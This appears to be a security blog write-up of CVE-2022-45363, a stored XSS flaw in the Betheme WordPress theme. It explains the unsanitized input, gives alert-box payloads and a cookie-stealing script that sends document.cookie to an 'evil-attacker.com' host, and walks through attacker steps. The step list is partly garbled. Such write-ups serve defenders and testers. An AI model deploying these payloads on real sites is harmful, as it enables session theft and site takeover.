CVE-2022-45363 - Authenticated Stored XSS in Muffingroup Betheme WordPress Theme (<= 26.6.1) – A Deep Dive

---

WordPress is used by millions of websites, and many of them rely on premium themes to make their sites look professional and operate smoothly. One of the most popular premium themes is Betheme by Muffingroup. But like any piece of software, themes can have security flaws. In this long read, let’s take a close, exclusive look at CVE-2022-45363 – a vulnerability discovered in Betheme that could have allowed authenticated users (even low-level subscribers) to inject malicious scripts into WordPress sites. We will explore the vulnerability, how it works, see a code snippet, and discuss ways attackers could exploit it.

What is CVE-2022-45363?

CVE-2022-45363 is an authenticated Stored Cross-Site Scripting (XSS) vulnerability in the Betheme WordPress theme. This flaw was present in all versions up to and including 26.6.1. Because "stored" XSS means the malicious code is stored in the database and executed every time someone views the infected page, it’s potentially highly dangerous.

The main issue here is that the theme didn't properly sanitize or escape some input fields in its admin panel. As a result, a logged-in user with very basic permissions (as low as "subscriber" role) could inject arbitrary JavaScript. When an administrator or another user viewed the infected page, that script would run in their browser—possibly stealing cookies, redirecting them, or causing other mischief.

### Because this is an authenticated XSS, for an attack to work, the hacker would need a valid user account (even as subscriber)—but that’s not a high barrier in communities, membership sites, or where registration is open.

Before diving deeper, here’s where you can read more from official and community sources

- CVE-2022-45363 on NVD (National Vulnerability Database)
- Patchstack Security Advisory
- Muffingroup Theme Changelog

1. Vulnerable Components

The vulnerability lies in the way Betheme handles certain user inputs within the admin area. For example, fields such as custom post options, headers, or widgets could receive HTML/JS input. These inputs were not correctly sanitized using WordPress’s esc_html() or wp_kses() functions.

The theme saves this input verbatim to the database

- Later, any other user or admin who views the modified area will see the attacker’s JavaScript executed as part of the page

Because the theme did not verify capability (using current_user_can()) in the right places, even a minimal-permission user could inject script.

Proof of Concept (PoC)

Let’s see a simple code example of what an attacker might do.

Don’t try this on a live or production site!

Suppose there’s a custom field for the theme called "Header Title," and it’s not sanitized.

A user could enter

XSS Test<script>alert('Hacked by XSS!')</script>

When an administrator (or any user) views the page rendering this field, their browser will execute

alert('Hacked by XSS!')

Instead of an alert, the attacker might use something stealthy, like

<script>fetch('https://evil-attacker.com/steal?cookie='+document.cookie)</script>

With this code, every time a victim views the compromised page, their browser silently sends cookies to the attacker’s server.

Exploit Details – Step by Step

Here is an example proof of concept flow that an attacker could follow, assuming registration is enabled:

Log in with your new account

3. Find a field exposed by Betheme’s custom panel (for example, some site meta option, widget content, or similar)
4. Inject XSS: Add code, e.g. <script>alert('pwnd');</script> or the stealthier cookie stealer above

Wait for an admin to visit the page – their browser executes your JavaScript

7. Profit: Depending on your JS, you can steal session cookies, deface the site, redirect the user, create admin accounts, etc.

Even after a malicious user is banned, their injected code may persist

Sites that accept user registrations are especially at risk!

`

Patch and Solution

After being notified, Muffingroup fixed this problem in Betheme version 26.6.2. You can see their changelog here:
Betheme Changelog

Conclusion

CVE-2022-45363 shows how even a popular premium WordPress theme can have dangerous flaws. If you run WordPress, always keep plugins and themes updated, and regularly review user roles and registrations. If you’re a developer, always sanitize and escape every bit of user input/output.

Have you checked your WordPress themes for security updates lately? Stay safe out there!

Further Reading

- XSS in WordPress: What you need to know – Patchstack Blog
- WordPress Data Sanitization and Validation


*This article was written to provide original, clear guidance for site owners, pentesters, and developers. Feel free to share with your peers and always test in a safe environment!*

Timeline

Published on: 11/22/2022 08:15:00 UTC
Last modified on: 11/28/2022 19:49:00 UTC